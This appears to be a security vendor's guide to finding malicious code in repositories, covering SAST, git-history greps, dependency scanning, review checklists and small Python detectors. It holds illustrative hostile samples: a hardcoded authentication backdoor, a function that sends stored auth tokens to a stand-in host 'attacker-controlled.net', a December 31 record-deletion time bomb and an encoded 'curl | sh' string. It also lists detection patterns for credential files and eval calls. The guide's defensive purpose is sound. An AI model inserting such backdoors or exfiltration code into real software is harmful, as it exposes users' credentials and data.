Malicious code in a software project doesn’t always arrive through external attackers exploiting vulnerabilities. It can also be introduced through a compromised dependency, a malicious contributor, a supply chain attack on your build toolchain, or an insider. Once inside, it often runs with the same privileges as your legitimate application, which makes it dangerous and hard to detect.
This guide covers the techniques used to systematically identify malicious code in source repositories.
What Malicious Source Code Looks Like
Malicious code inserted into a codebase typically falls into one of these categories:
1. Backdoors
Hidden functionality that allows unauthorized access, often disguised as legitimate feature code:
# Disguised as "debug mode" but activates on a specific token
def authenticate(user, password, debug_token=None):
    if debug_token == "4x7k-internal-2024":  # ← Hardcoded backdoor
        return True
    return check_password(user, password)
2. Data Exfiltration
Code that silently sends sensitive data to an external endpoint:
// Hidden in a legitimate-looking analytics helper
function trackPageView(page) {
  // Legitimate tracking (a request with a body must not use the default GET method)
  fetch('https://analytics.example.com/track', {
    method: 'POST',
    body: JSON.stringify({ page })
  });
  // Malicious: also exfiltrates auth tokens
  const token = localStorage.getItem('auth_token');
  if (token) {
    fetch('https://attacker-controlled.net/collect', {
      method: 'POST',
      body: token
    });
  }
}
3. Cryptominers
CPU-intensive code embedded to mine cryptocurrency using your users’ or servers’ resources:
// Often obfuscated or loaded from an external script tag
const _0x4f2a = ['WebAssembly', 'instantiateStreaming'];
// ... heavily obfuscated miner code
4. Supply Chain Injections
Malicious code injected into a third-party package that your project depends on. The SolarWinds breach and the event-stream npm package incident are canonical examples.
5. Time-Bombed or Trigger-Based Code
// Only executes on a specific date or condition
public void process(Request req) {
    Calendar c = Calendar.getInstance();
    // Calendar.MONTH is zero-based, so 11 is December
    if (c.get(Calendar.MONTH) == 11 && c.get(Calendar.DAY_OF_MONTH) == 31) {
        // Destructive payload executed on Dec 31
        deleteAllRecords();
        return;
    }
    normalProcess(req);
}
Detection Method 1: Static Analysis (SAST) with Malware Signatures
A SAST tool with malware detection capability scans source code for known malicious patterns:
- Hardcoded IP addresses or domains in non-configuration files
- Encoded/obfuscated strings (base64, hex encoding, eval of dynamic strings)
- Unusual network calls to non-whitelisted domains
- Deletion or encryption of files outside expected scope
- Access to sensitive system files (/etc/passwd, registry keys)
- Cryptocurrency mining APIs or WebAssembly blobs
Offensive360’s SAST engine includes dedicated malware pattern analysis that scans for these indicators across all supported languages.
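To make the indicator list concrete, here is a minimal Python sketch of a signature-style scan. It is not how any particular SAST product works; the `INDICATORS` table, the pattern names, and the `scan_text` helper are all assumptions made for illustration, and simple regexes like these will produce false positives on real code.

```python
import re

# Hypothetical indicator patterns; tune these for your own codebase.
INDICATORS = {
    "hardcoded_ip": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "long_base64": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
    "dynamic_eval": re.compile(r"\b(?:eval|exec)\s*\("),
    "sensitive_path": re.compile(r"/etc/(?:passwd|shadow)"),
}


def scan_text(text):
    """Return (line_number, indicator_name) pairs for every match in text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                findings.append((lineno, name))
    return findings


# Illustrative input: line 1 contains an IP-based URL, line 3 an eval call.
sample = 'url = "http://203.0.113.7/payload"\nprint("hello")\neval(decoded)\n'
for lineno, name in scan_text(sample):
    print(f"line {lineno}: {name}")
```

A scan like this is only a first filter: each hit still needs a human to decide whether the IP, encoded string, or eval call has a legitimate reason to be there.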
Detection Method 2: Git History Analysis
Malicious code often enters through a specific commit. Audit your git history for:
# Find added lines that contain external URLs or IP addresses
git log -p --all | grep -E "^\+.*(https?://|[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3})"
# Find added lines that contain base64-looking strings
git log -p --all | grep -E "^\+.*[A-Za-z0-9+/]{40,}={0,2}"
# List commits sorted by author email to spot unexpected contributors
git log --all --format='%H %ae %s' | sort -k2
# Commits that added binary files (matched by extension)
git log --all --diff-filter=A -- "*.bin" "*.wasm" "*.dll"
Red flags in git history:
- A commit that modifies an unrelated file alongside legitimate changes
- A contributor account that was recently created or has no prior activity
- A commit at an unusual time (3am in a different timezone)
- A commit that modifies build scripts, CI configuration, or package lock files
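The last red flag lends itself to automation. The sketch below, written under stated assumptions, parses the text produced by `git log --all --name-only --format='commit %H'` and reports commits that touched build, CI, or lockfile paths. The `SENSITIVE_PATTERNS` list and both function names are hypothetical; adjust the patterns to match your repository layout.

```python
import fnmatch

# Hypothetical patterns for build, CI, and lockfile paths.
SENSITIVE_PATTERNS = [
    ".github/workflows/*",
    "Makefile",
    "Dockerfile",
    "package-lock.json",
    "yarn.lock",
    "*.gradle",
]


def is_sensitive(path):
    """True if path matches any sensitive pattern (case-sensitive glob)."""
    return any(fnmatch.fnmatchcase(path, p) for p in SENSITIVE_PATTERNS)


def flag_commits(log_text):
    """Map commit hash -> sensitive paths it touched.

    Expects the output of:
        git log --all --name-only --format='commit %H'
    """
    flagged = {}
    current = None
    for line in log_text.splitlines():
        line = line.strip()
        if line.startswith("commit "):
            current = line.split()[1]
        elif line and current and is_sensitive(line):
            flagged.setdefault(current, []).append(line)
    return flagged


# Made-up log excerpt with two commits.
sample_log = """commit aaa111

src/app.py
README.md

commit bbb222

src/util.py
.github/workflows/ci.yml
package-lock.json
"""
print(flag_commits(sample_log))
```

A flagged commit is not necessarily malicious; the point is to route changes to these files to a reviewer who knows what the build is supposed to do.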
Detection Method 3: Dependency Scanning (SCA)
Many supply chain attacks arrive through dependencies rather than direct code changes. Scan every dependency against known vulnerability and malicious-package advisories:
# npm
npm audit
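# Checks a deployed site's front-end libraries, not your dependency tree; needs a URL (placeholder shown)
npx is-website-vulnerable https://example.com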
# Python
pip-audit
# Ruby
bundle audit
# .NET
dotnet list package --vulnerable
Beyond known CVEs, look for:
- Packages with very new versions that suddenly modify network behavior
- Packages where the maintainer account changed hands recently
- Typosquatting: lodash vs 1odash, express vs expres
- Packages with install scripts (preinstall, postinstall) that make network calls
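Two of these checks are easy to sketch in Python. The example below flags names within one edit of a package you actually intend to use, and lists install-time scripts declared in a package.json document. The `KNOWN_PACKAGES` list, the distance threshold, and all function names are assumptions for illustration; a real check would use your own dependency manifest as the reference list.

```python
import json

# Hypothetical list of package names your project actually intends to use.
KNOWN_PACKAGES = ["lodash", "express", "react", "requests"]
INSTALL_HOOKS = ("preinstall", "install", "postinstall")


def edit_distance(a, b):
    """Levenshtein distance via the standard dynamic-programming recurrence."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1, curr[j - 1] + 1, prev[j - 1] + cost))
        prev = curr
    return prev[-1]


def possible_typosquat(name, max_distance=1):
    """Return the known package that name closely resembles, or None."""
    if name in KNOWN_PACKAGES:
        return None
    for known in KNOWN_PACKAGES:
        if edit_distance(name, known) <= max_distance:
            return known
    return None


def install_hooks(package_json_text):
    """Return the install-time scripts declared in a package.json document."""
    scripts = json.loads(package_json_text).get("scripts", {})
    return {hook: scripts[hook] for hook in INSTALL_HOOKS if hook in scripts}


print(possible_typosquat("1odash"))
print(install_hooks('{"scripts": {"postinstall": "node fetch.js", "test": "jest"}}'))
```

An install hook is not suspicious on its own, since many packages compile native code at install time. What matters is whether the script it runs makes network calls or touches files outside the package.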
Detection Method 4: Code Review Checklists
When reviewing code (especially from external contributors or after a dependency update), look for:
Network activity:
- Are all outbound network calls to known, approved endpoints?
- Is there any fetch/HTTP call that doesn’t have a corresponding feature requirement?
- Are URLs or IPs hardcoded instead of loaded from configuration?
Obfuscation:
- Is there any eval(), exec(), os.system(), or dynamic code execution?
- Are there long base64-encoded strings not related to legitimate assets?
- Is there code that decodes and executes a string at runtime?
Data access:
- Does this code access environment variables, tokens, or secrets?
- Is it reading files outside the expected application scope?
- Does it access the clipboard, cookies, or local storage for no stated reason?
Conditional execution:
- Is there any logic that only triggers on specific dates, system states, or input values?
- Are there commented-out blocks with suspicious-looking code?
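For Python code, the obfuscation questions in this checklist can be partly automated with the standard `ast` module, which parses source without running it. The following is a sketch under stated assumptions: the `SUSPICIOUS_NAMES` and `SUSPICIOUS_ATTRS` sets are an illustrative selection, not a complete list, and aliased imports (for example `from os import system`) would slip past it.

```python
import ast

# Call names treated as dynamic execution in this sketch (extend as needed).
SUSPICIOUS_NAMES = {"eval", "exec", "compile", "__import__"}
SUSPICIOUS_ATTRS = {("os", "system"), ("os", "popen"), ("subprocess", "Popen")}


def find_dynamic_execution(source):
    """Return sorted (line, call_name) pairs for suspicious calls in Python source."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        func = node.func
        if isinstance(func, ast.Name) and func.id in SUSPICIOUS_NAMES:
            findings.append((node.lineno, func.id))
        elif (
            isinstance(func, ast.Attribute)
            and isinstance(func.value, ast.Name)
            and (func.value.id, func.attr) in SUSPICIOUS_ATTRS
        ):
            findings.append((node.lineno, f"{func.value.id}.{func.attr}"))
    return sorted(findings)


# The sample is only parsed, never executed.
sample = (
    "import os, base64\n"
    "payload = base64.b64decode(blob)\n"
    "exec(payload)\n"
    "os.system('curl http://203.0.113.7 | sh')\n"
)
print(find_dynamic_execution(sample))
```

Working on the syntax tree rather than raw text avoids matching the word "eval" inside comments or string literals, which is the main weakness of grep-based checks.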
Detection Method 5: Runtime Monitoring
Even with thorough static analysis, some malicious code only activates at runtime. Supplement static detection with:
- Outbound network monitoring: Alert on any process making network calls to domains not on a whitelist
- File system auditing: Monitor for reads of /etc/shadow, ~/.ssh/id_rsa, credential files
- Process monitoring: Alert on unexpected child processes spawned by your application
- Memory scanning: Detect in-memory code injection or shellcode execution
Tools: Falco (Kubernetes), auditd (Linux), Microsoft Defender for Endpoint (formerly Windows Defender ATP), eBPF-based monitoring.
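The outbound network check reduces to a membership test once connection events are available. The sketch below assumes events arrive as (process, host) pairs from whatever monitoring tool you use; the `ALLOWED_DOMAINS` set and both function names are hypothetical.

```python
# Hypothetical allowlist; in practice this would come from configuration.
ALLOWED_DOMAINS = {"api.example.com", "analytics.example.com"}


def is_allowed(host):
    """True if host is an allowlisted domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in ALLOWED_DOMAINS)


def unexpected_connections(events):
    """Filter (process, host) connection events down to non-allowlisted ones."""
    return [(proc, host) for proc, host in events if not is_allowed(host)]


# Made-up events for illustration.
events = [
    ("web", "api.example.com"),
    ("web", "attacker-controlled.net"),
    ("worker", "eu.analytics.example.com"),
    ("web", "evilapi.example.com"),
]
for proc, host in unexpected_connections(events):
    print(f"ALERT: {proc} connected to {host}")
```

The subdomain test matches on "." plus the domain rather than a bare suffix, so a lookalike such as evilapi.example.com is not mistaken for api.example.com.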
High-Risk Entry Points to Monitor
| Entry Point | Risk | Mitigation |
|---|---|---|
| Open-source dependencies | Supply chain injection | SCA scanning + lockfile pinning |
| CI/CD pipeline actions | Malicious GitHub Actions | Pin action versions to commit hash |
| Docker base images | Trojaned images | Use verified official images + scan |
| External contributors | Direct code injection | Mandatory code review + SAST gate |
| Build toolchain | Compiler/toolchain compromise | Verify checksums, use reproducible builds |
| Package registries | Typosquatting, account takeover | Dependency pinning, audit new versions |
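As one example of enforcing a mitigation from the table, this sketch checks GitHub Actions workflow text for `uses:` references that are not pinned to a full 40-character commit SHA. It works on raw text with a regex rather than a YAML parser, which is an assumption that holds for conventionally formatted workflows only. The function name and the sample SHA are made up.

```python
import re

# Matches a `uses: owner/repo@ref` step; local actions (./path) have no @ref.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*([^\s@#]+)@([^\s#]+)")
FULL_SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_text):
    """Return (line_number, action, ref) for refs that are not a full commit SHA."""
    findings = []
    for lineno, line in enumerate(workflow_text.splitlines(), start=1):
        match = USES_RE.match(line)
        if match and not FULL_SHA_RE.match(match.group(2)):
            findings.append((lineno, match.group(1), match.group(2)))
    return findings


FAKE_SHA = "0123456789abcdef0123456789abcdef01234567"  # made-up 40-character SHA
workflow = f"""steps:
  - uses: actions/checkout@v4
  - uses: actions/setup-node@{FAKE_SHA}  # v4
  - name: Build
    uses: ./.github/actions/build
"""
print(unpinned_actions(workflow))
```

Tags such as v4 can be moved to point at different code after the fact, whereas a full commit SHA cannot, which is why the table recommends pinning to the hash.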
Indicators of Compromise in Source Code
Look for these specific patterns regardless of language:
# Suspicious patterns to search for
grep -rn "eval\|exec\|system\|shell_exec\|base64_decode" src/
grep -rn "http[s]\?://[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+" src/ # IP-based URLs
grep -rn "atob\|btoa\|fromCharCode" src/
grep -rn "process\.env\." src/ | grep -v "\.config\." | grep -v "test"
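Grep can find encoded strings but cannot tell you what they contain. A possible follow-up step, sketched here in Python, is to decode base64-looking strings and check the result for markers such as URLs or shell invocations. The 24-character threshold, the `SUSPICIOUS_DECODED` marker list, and the function names are all assumptions chosen for illustration.

```python
import base64
import binascii
import re

CANDIDATE_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# Substrings that make a decoded payload worth a closer look (illustrative list).
SUSPICIOUS_DECODED = (b"http://", b"https://", b"/bin/sh", b"eval(", b"powershell")


def decode_candidates(text):
    """Yield (encoded, decoded_bytes) for strings that decode cleanly as base64."""
    for match in CANDIDATE_RE.finditer(text):
        encoded = match.group(0)
        try:
            yield encoded, base64.b64decode(encoded, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 (for example, wrong length); skip it


def suspicious_payloads(text):
    """Return decoded payloads that contain a suspicious marker."""
    return [
        decoded
        for _, decoded in decode_candidates(text)
        if any(marker in decoded.lower() for marker in SUSPICIOUS_DECODED)
    ]


# Build a sample the way an attacker might hide a command in a string literal.
hidden = base64.b64encode(b"curl https://attacker-controlled.net/x | sh").decode()
source_line = f'const p = atob("{hidden}");'
print(suspicious_payloads(source_line))
```

Long identifiers also match the candidate pattern, but they usually either fail to decode or decode to bytes with none of the markers, so they drop out of the result.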
Building a Malicious Code Detection Pipeline
For ongoing protection, integrate detection into your development lifecycle:
- Pre-commit hooks — Git hooks to block obvious malicious patterns (hardcoded secrets, suspicious evals) before commit
- CI/CD SAST gate — Full static analysis + malware scan on every PR
- Dependency update monitoring — Automated SCA on every dependency change
- Periodic full-repo scans — Weekly SAST scan of the entire codebase, not just diffs
- Incident response plan — Defined process for when malicious code is detected
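The pre-commit step can be sketched as a function over a unified diff that inspects only added lines. This example assumes the hook script feeds it the output of `git diff --cached` and exits with the returned code; the `BLOCK_PATTERNS` list and the function names are hypothetical, and a real hook would share its rules with the CI scan.

```python
import re

# Illustrative patterns only.
BLOCK_PATTERNS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}"),
]


def violations(diff_text):
    """Return added lines in a unified diff that match a blocked pattern."""
    hits = []
    for line in diff_text.splitlines():
        # Added lines start with "+"; "+++ " introduces the file header.
        if line.startswith("+") and not line.startswith("+++ "):
            if any(p.search(line) for p in BLOCK_PATTERNS):
                hits.append(line[1:].strip())
    return hits


def hook_exit_code(diff_text):
    """Return 1 (block the commit) if any violation is found, otherwise 0."""
    return 1 if violations(diff_text) else 0


# Made-up staged diff: the removed eval call should not be reported.
sample_diff = """diff --git a/app.js b/app.js
--- a/app.js
+++ b/app.js
@@ -1,2 +1,3 @@
 const x = 1;
-eval(oldCode);
+fetch("http://203.0.113.7/c");
+const y = 2;
"""
print(violations(sample_diff), hook_exit_code(sample_diff))
```

Checking only added lines keeps the hook fast and avoids blocking commits that remove a suspicious pattern, which is exactly the kind of change you want to let through.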
Offensive360 SAST includes dedicated malware and backdoor detection alongside standard vulnerability scanning. Scan your codebase now or book a demo to see the malware analysis engine in action.